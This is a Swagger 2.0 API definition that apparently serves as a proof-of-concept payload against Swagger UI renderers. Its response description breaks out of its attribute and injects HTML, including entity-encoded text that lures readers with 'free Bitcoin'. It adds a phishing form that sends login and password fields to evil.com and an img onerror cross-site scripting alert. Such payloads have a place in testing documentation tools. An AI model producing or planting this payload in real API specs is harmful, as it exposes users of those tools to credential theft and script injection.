 
swagger: '2.0'
info:
  title: Get $1000 worth of free Bitcoin
  description: |
    Teste
paths:
  /Free Bitcoin (Click Here):
    get:
      responses:
        '200':
          description: No response was specified'"><h1>&#x46;&#x52;&#x45;&#x45;&#x20;&#x42;&#x49;&#x54;&#x43;&#x4f;&#x49;&#x4e;&#x3a;&#x20;&#x50;&#x55;&#x54;&#x20;&#x59;&#x4f;&#x55;&#x52;&#x20;&#x44;&#x41;&#x54;&#x41;&#x20;&#x42;&#x45;&#x4c;&#x4f;&#x57;&#x3a;&#x20;<p><form action="https://evil.com"  method="get"><label><h1>&#x45;&#x6e;&#x74;&#x65;&#x72;&#x20;&#x77;&#x69;&#x74;&#x68;&#x20;&#x79;&#x6f;&#x75;&#x72;&#x20;&#x6c;&#x6f;&#x67;&#x69;&#x6e;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6f;&#x72;&#x64;&#x3a;<p><input type="text" name="login"><p><input type="text" name="password"><p><input type="submit" value="Send"><p><h4><img src=x onerror=alert('Swagger-XSS')>
      tags:
        - Free Bitcoin
      operationId: findAccounts
      summary: Finds all accounts
